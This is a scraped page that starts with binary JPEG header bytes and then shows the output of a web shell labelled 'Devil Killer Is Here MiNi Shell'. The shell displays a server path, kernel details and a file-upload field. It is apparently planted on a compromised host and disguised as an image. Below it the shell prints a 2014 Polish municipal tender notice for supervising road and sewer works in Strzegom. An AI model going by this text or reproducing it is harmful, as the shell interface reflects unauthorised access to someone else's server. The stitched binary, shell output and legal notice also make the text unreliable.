JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140604/120823-N-2014.html

<p class="kh_header"><b>Strzegom: Wykonywanie funkcji inspektora nadzoru inwestorskiego  nad realizacją robót budowlanych występujących przy  zadaniu pod nazwą Przebudowa dróg gminnych wraz  
z infrastrukturą towarzyszącą prowadzących do terenów powojskowych - ul. Armii Krajowej i Wesołej 
w Strzegomiu - ETAP II.</b><br>
<b>Numer ogłoszenia: 120823 - 2014; data zamieszczenia: 04.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie funkcji inspektora nadzoru inwestorskiego  nad realizacją robót budowlanych występujących przy  zadaniu pod nazwą Przebudowa dróg gminnych wraz  
z infrastrukturą towarzyszącą prowadzących do terenów powojskowych - ul. Armii Krajowej i Wesołej 
w Strzegomiu - ETAP II..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie funkcji inspektora nadzoru inwestorskiego nad realizacją robót budowlanych występujących przy zadaniu pod nazwą : Przebudowa dróg gminnych wraz z infrastrukturą towarzyszącą prowadzących do terenów powojskowych - ul. Armii Krajowej i Wesołej w Strzegomiu- ETAP II w pełnym zakresie 
w specjalnościach:
1)	instalacyjnej w zakresie  sieci instalacji i urządzeń wodociągowych i kanalizacyjnych,
2)	drogowej
3)	instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych.

Zadanie 1. Przebudowa drogi gminnej nr 110757D ul. Armii Krajowej oraz drogi gminnej nr 110777D ul. Wesoła w Strzegomiu- ETAP II. Zadanie 1 planowane jest do dofinansowania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (Priorytet IX  Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców).

Zadanie 2. Przebudowa kanalizacji sanitarnej i deszczowej miasta Strzegom- Budowa kanalizacji sanitarnej w ul. Wesołej w Strzegomiu.
Zadanie 2 nie objęte dofinansowaniem.

W przypadku braku otrzymania dofinansowania Zamawiający zastrzega sobie prawo do unieważnienia przetargu.   

2. Zakres przedmiotu zamówienia:
Przedmiotem zamówienia jest wykonywanie funkcji inspektora nadzoru inwestorskiego nad realizacją robót budowlanych występujących przy zadaniu : Przebudowa dróg gminnych  wraz 
z infrastrukturą towarzyszącą prowadzących do terenów powojskowych-ul. Armii Krajowej 
i Wesołej w Strzegomiu- ETAP II  w pełnym zakresie w specjalnościach:



1)	instalacyjnej w zakresie  sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
2)	drogowej,
3)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.

W przypadku świadczenia usługi przez więcej niż jedną osobę, Wykonawca  ustanawia koordynatora zespołu inspektorów nadzoru posiadającego uprawnienia budowlane, będącego członkiem właściwej izby samorządu zawodowego i posiadającego wymagane ubezpieczenie od odpowiedzialności cywilnej. Wykonawca ustanawia (może ustanowić)  następujących inspektorów nadzoru inwestorskiego robót w poszczególnych branżach:
1)  instalacyjnej w zakresie sieci kanalizacyjnych posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie  sieci, instalacji 
i urządzeń wodociągowych i kanalizacyjnych,
2) drogowej posiadającego uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej,
3) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych   posiadającego uprawnienia budowlane.

3. Opis nadzorowanej inwestycji. 

3.1. ZADANIE 1:  Przebudowa drogi gminnej nr 110757D ul. Armii Krajowej oraz drogi gminnej nr  110777D ul. Wesoła w Strzegomiu - ETAP II 
przewidziane do dofinansowania z udziałem środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (Priorytet IX Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców) 

Przedmiotem zamówienia jest przebudowa drogi gminnej 110757D ul. Armii Krajowej na odcinku od początku opracowania w hm 0+0,00 do hm 4+65,50 wraz z odcinkiem drogi przebiegającym przez działkę kolejową nr 775 ul. Armii Krajowej oraz drogi gminnej nr 110777D ul. Wesoła  od początku opracowania w hm 0+0,00 do hm 4+50,42 wraz odcinkiem drogi przebiegającym przez działkę kolejową nr 775  ul. Wesoła , w tym:

Zakres robót  objęty  pozwoleniem na budowę:
1) Decyzja Nr 221/2013 z dnia 07 marca 2013 roku znak WB.6740.181.2013.3 wydana przez Starostę Świdnickiego (bez terenu zamkniętego PKP S.A.),
2) Decyzja Nr I-K/Z-96/13 z dnia 28.03.2013r. teren zamknięty PKP - Wojewody Dolnośląskiego.
Na terenie zamkniętym PKP -ul. Armii Krajowej i ul. Wesoła w Strzegomiu roboty drogowe należy wykonywać zgodnie z uzgodnieniami wydanymi przez PKP.

Zakres robót obejmuje roboty między innymi:
a) w zakresie branży drogowej na terenie gminnym wykonanie:
- rozbiórki konstrukcji nawierzchni jezdni i chodników, 
- rozbiórki krawężników, 
- rozbiórki konstrukcji nawierzchni zjazdów, 
- przebudowy skrzyżowań ul. Armii Krajowej z ul. Koszarową i ul. Armii Krajowej z ul. Ceglaną,
- budowy chodnika w ul. Armii Krajowej na odcinku od wiaduktu kolejowego 
  do ul. Ceglanej,
- jezdni o nawierzchni bitumicznej,
- chodników o nawierzchni z kostki betonowej szarej,
- zjazdów o nawierzchni z kostki kamiennej,
- miejsc postojowych o nawierzchni z kostki kamiennej,
- regulacji wysokościowej wszystkich urządzeń obcych do nowoprojektowanej nawierzchni.

b) w zakresie branży elektrycznej na terenie gminnym wykonanie:
- demontażu istniejących urządzeń oświetlenia drogowego,
- wykopów pod kabel NN,
- zasypywania rowów,
- układania uziomów w rowach kablowych,
- ułożenia rur osłonowych, kabla 
- zasypania kabla,
- montażu i stawiania słupów oświetleniowych,
- montażu opraw oświetlenia zewnętrznego na wysięgniku,
- pomiarów powykonawczych.

c) wprowadzenie docelowej organizacji ruchu zgodnie z zatwierdzonym projektem przez Starostę Świdnickiego - zatwierdzenie z dnia 17 grudnia 2012 r. znak: KD.7121.449.2012.2. Wykonawca robót na 14 dni przed dniem wprowadzenia organizacji ruchu musi powiadomić o tym fakcie Starostwo Powiatowe w Świdnicy.
Wymagane jest prowadzenie prac zgodnie z  Decyzją Nr 221/2013 z dnia 07 marca 2013 roku znak: WB.6740.181.2013.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego Wymagane jest prowadzenie robót zgodnie z  Decyzją Nr 221/2013 z dnia 07 marca 2013 roku znak:  WB.6740.181.2013.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego  oraz 
Decyzją Nr I-K/Z-96/13 z dnia 28.03.2013r. teren zamknięty PKP - Wojewody Dolnośląskiego.
Na terenie zamkniętym PKP -ul. Armii Krajowej i ul. Wesoła w Strzegomiu roboty drogowe należy wykonywać zgodnie z uzgodnieniami wydanymi przez PKP.

3.2. ZADANIE 2: Przebudowa kanalizacji sanitarnej i deszczowej miasta Strzegom - Budowa kanalizacji deszczowej  w ul. Wesołej w Strzegomiu. 
nie przewidziane do dofinansowania.
Przedmiotem zamówienia jest budowa  odcinka kanalizacji deszczowej wraz z wypustami
w ul. Wesołej w Strzegomiu w celu zapewnienia odwodnienia odcinka tej ulicy na odcinku
od studni D9.2 do studni D9.19.

2.Zakres robót obejmuje między innymi:
  1) przygotowanie terenu pod budowę:
      a) rozbiórka elementów drogi z wywiezieniem,
      b) roboty ziemne, wykopy oraz przekopy, umocowanie ścian wykopów, odwodnienie  
          wykopów,  zasypanie wykopów, 
   
   2) roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich   
      części oraz roboty w zakresie inżynierii lądowej i wodnej:
      rurociągi :
      a) podłoża pod kanały i obsypka rurociągów z materiałów sypkich,
      b) kanały z rur PP SN8 o średnicy 300mm,
      c) kanały z rur PP SN8 o średnicy 250mm,
      d) kanały z rur PP SN8 o średnicy 150mm,
 e) studzienki kanalizacyjne wykonywane jako włazowe z betonowych elementów       prefabrykowanych: kręgów o średnicy wewnętrznej 1200mm, 1000mm, monolitycznej dennicy 
z otworami wlotowymi i wylotowym ze stopniami złazowymi z żeliwa sferoidalnego w otulinie  PE  w trakcie  produkcji, nie dopuszcza się montażu stopni złazowych na budowie, zwieńczenie        studzienek betonowych wykonane za pomocą płyty żelbetowej, pierścieni dystansowych i włazu       żeliwnego kl.400 z wypełnieniem betonowym i otworami wentylacyjnymi. W drodze - dla       wszystkich studni  należy stosować pierścienie odciążające jak w części graficznej dokumentacji         projektowej. Pozostałe  wymagania dotyczące studni zgodnie ze STWiORB oraz normami,        studzienki tworzywowe o średnicy 600mm, studzienki ściekowe uliczne z wypustem kl.C typu     
     67BK z kołnierzem,
   f) próby szczelności, zagęszczanie zasypki nie mniejsze niż 95% dla przewodów umieszczonych pod drogami, zasypanie wykopów,
   g) kamerowanie kanałów. 

Symbol CPV 45100000-8 - Przygotowanie terenu pod budowę.
Symbol CPV 45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej.
Przedmiot zamówienia nie obejmuje realizacji budowy kanalizacji deszczowej w ul. Leśnej
w Strzegomiu.
  
Szczegółowy zakres robót  budowlanych:
1) Zadanie 1. Przebudowa drogi gminnej nr 110757D ul. Armii Krajowej oraz drogi gminnej 
nr  110777D ul. Wesoła w Strzegomiu - ETAP II  zawarty jest w dokumentacji projektowej i:
- Decyzji Nr 221/2013 z dnia 07 marca 2013 roku znak WB.6740.181.2013.3 wydana przez Starostę Świdnickiego (bez terenu zamkniętego PKP S.A.), STWiORB,
- Decyzji Nr I-K/Z-96/13 z dnia 28.03.2013r. teren zamknięty PKP - Wojewody Dolnośląskiego.
   Na terenie zamkniętym PKP -ul. Armii Krajowej i ul. Wesoła w Strzegomiu, STWIiORB.
2) Zadania 2 . Przebudowa kanalizacji sanitarnej i deszczowej miasta Strzegom -Budowa  
kanalizacji deszczowej w ulicy Wesołej i Leśnej w Strzegomiu zawarty jest w dokumentacji 
projektowej, specyfikacji technicznej wykonania i  odbioru robot budowlanych oraz pozwoleniu na 
budowę - Decyzja Nr 1599/2008 Starosty Świdnickiego z dnia 15.12.2008r. - budowa odcinka sieci  kanalizacji deszczowej wraz z przykanalikami w rejonie ulic Wesołej i Leśnej.

4. Do obowiązków Inspektora należy w szczególności:
1) reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności jej realizacji
z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej, 
2) sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych, 
a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych 
i  niedopuszczonych do stosowania w  budownictwie,
3) rzeczowe i finansowe rozliczenie robót wynikających z zawartej umowy z Wykonawcą robót budowlanych, 
4) rozliczenie materiałów pozyskanych w wyniku demontażu, 
5) zapewnienie, że roboty są wykonywane zgodnie z odpowiednimi wymaganiami bezpieczeństwa i ochrony zdrowia, 
6) sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających,   
przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania, potwierdzanie faktyczne wykonanych robót oraz usunięcia wad, a także na żądanie Zamawiającego kontrolowanie rozliczeń budowy,
7) bieżąca kontrola wydatków robót budowlanych oraz korekta rzeczowo - finansowa o roboty dodatkowe przy uwzględnieniu rozwiązań zamiennych - oszczędnościowych i sporządzanie protokołów konieczności, po uzgodnieniu z Zamawiającym,
8) kontrola rozliczenia materiałów powierzonych przez Zamawiającego w oparciu  
o dokumentację,   
9) akceptowanie proponowanych przez Wykonawcę robót materiałów, oraz urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót w zakresie ich zgodności ze specyfikacjami technicznymi, dokumentacją projektową i umową na roboty budowlane,                                              
10) kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów  stwierdzających wszystkie  okoliczności mające znaczenie dla właściwego procesu    budowlanego oraz wyceny robót, 
11) zatwierdzanie wszystkich zmian rozwiązań projektowych i specyfikacji technicznych, które mogą okazać się niezbędne lub pożądane podczas lub w następstwie wykonywania robót budowlanych,
12) sprawdzanie i potwierdzenie kompletności dokumentacji powykonawczej poprzez umieszczenie podpisu wraz  pieczęcią na każdej stronie inwentaryzacji (zawierającej między innymi: oryginał Dziennika Budowy, pełną dokumentację zgromadzoną w trakcie realizacji inwestycji np. uzgodnienia, badania, protokoły, oświadczenia wraz z geodezyjną inwentaryzacją powykonawczą) i przekazanie Zamawiającemu,
13) przybycie na wezwanie Zamawiającego w sprawach dotyczących robót budowlanych objętych nadzorem, 
14) udzielanie na żądanie Zamawiającego informacji o stanie realizacji robót, 
15) prowadzenie dziennika budowy,
16) obowiązek dokonania odbioru końcowego robót w imieniu Zamawiającego  oraz  odbiorów gwarancyjnych i odbioru ostatecznego, jak również sporządzenie z odbiorów protokołów,
17)udział w spotkaniach oraz naradach koordynacyjnych  organizowanych przez Zamawiającego w sprawach dotyczących realizacji  budowy jak również sporządzanie z nich protokołów, notatek,
18) kontrolowanie przebiegu robót zgodnie z harmonogramem rzeczowo-terminowo-finansowym  przebiegu robót,
19) sprawdzanie pełnych rozliczeń końcowych budowy.
20) pobyt na budowie co najmniej trzy razy w tygodniu, a każdorazowe przybycie na  budowę ma być potwierdzane na liście obecności w Wydziale Gospodarki Komunalnej, Ochrony  Środowiska i Wsi w Urzędzie Miejskim w Strzegomiu w pok. nr 26,
21)  sprawdzanie i zatwierdzanie harmonogramu rzeczowo- terminowo- finansowego poprzez umieszczenie na harmonogramie podpisu, daty i pieczęci,
22) sporządzenie w imieniu Zamawiającego  inwentaryzacji robót w toku w przypadku  
 odstąpienia od  umowy z Wykonawcą, na dzień odstąpienia od umowy 
23) sporządzanie pisemnych raportów dotyczących stopnia realizacji robót budowlanych objętych nadzorem raz w miesiącu wraz z dokumentacją fotograficzną - tj. do ostatniego dnia każdego miesiąca. 
	
	W ramach wynagrodzenia ryczałtowego  określonego w umowie Wykonawca będzie pełnił  swoje obowiązki do dnia wygaśnięcia terminu gwarancji jakości i rękojmi za wady określonego 
w umowie pomiędzy Gminą Strzegom a Wykonawcą robót budowlanych na okres 36 miesięcy od  dnia sporządzenia protokołu odbioru końcowego robót. Wykonawca pełniąc czynności Inspektora nadzoru inwestorskiego w tym czasie działa w imieniu i na rachunek Zamawiającego i ponosi wobec Zamawiającego odpowiedzialność za wyrządzone szkody, będące normalnym następstwem niewykonania lub nienależytego wykonania przedmiotu umowy, ocenianego w granicach przewidzianych dla umów starannego działania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1900,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	w specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń: wodociągowych                                       
 i kanalizacyjnych:
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  /osoba, którą dysponuje lub będzie dysponować wykonała co najmniej jedną usługę nadzoru nad budową, lub przebudową, bądź rozbudową sieci kanalizacji deszczowej bądź sanitarnej o wartości minimum 300 000zł brutto,

b)  w specjalności drogowej:
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał / osoba, którą dysponuje lub będzie dysponować wykonała  co najmniej jedną usługę nadzoru nad budową, lub przebudową, bądź rozbudową drogi 
o wartości minimum 1 000 000zł brutto, 

c) w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
i elektroenergetycznych:
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 

lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał / osoba, którą dysponuje lub będzie dysponować wykonała co najmniej jedną usługę nadzoru nad budową, lub  przebudową, bądź rozbudową oświetlenia drogowego o wartości minimum 100 000 zł brutto.

Nadzory te mogą stanowić odrębne zamówienie lub wchodzić w zakres jednego przedsięwzięcia. Wykonawca musi wykazać, że  usługa ta została wykonywana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:
     - instalacyjnej w zakresie  sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,  
     - drogowej bez ograniczeń,
     - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
wraz z informacją o podstawie dysponowania tą osobą/tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
1.  Potwierdzeniem spełnienia warunków będzie złożenie dokumentów i oświadczeń. Z treści złożonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez Wykonawcę wymaganych warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez Wykonawcę dokumentów 
i oświadczeń na zasadzie spełnia warunek/nie spełnia warunku. 

2.  Dla potrzeb oceny spełnienia warunku dot. wiedzy i doświadczenia, w przypadku gdy wartości zostaną podane w walutach innych niż PLN,  Zamawiający przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.            

3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami      niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Zobowiązanie musi wskazywać przekazane zasoby (rozdział VII pkt 6 siwz).  
4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego warunki spełniają łącznie, natomiast każdy z wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie 
art. 24 ust. 1 ustawy Pzp.


5. Wykonawcy wspólnie ubiegający się o zamówienie:
1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2)	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do
 podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność 
z  oryginałem wszystkich dokumentów,	
3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem,
4)	jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców, 
5)	Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako reprezentant pozostałych (liderem),
6)	Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

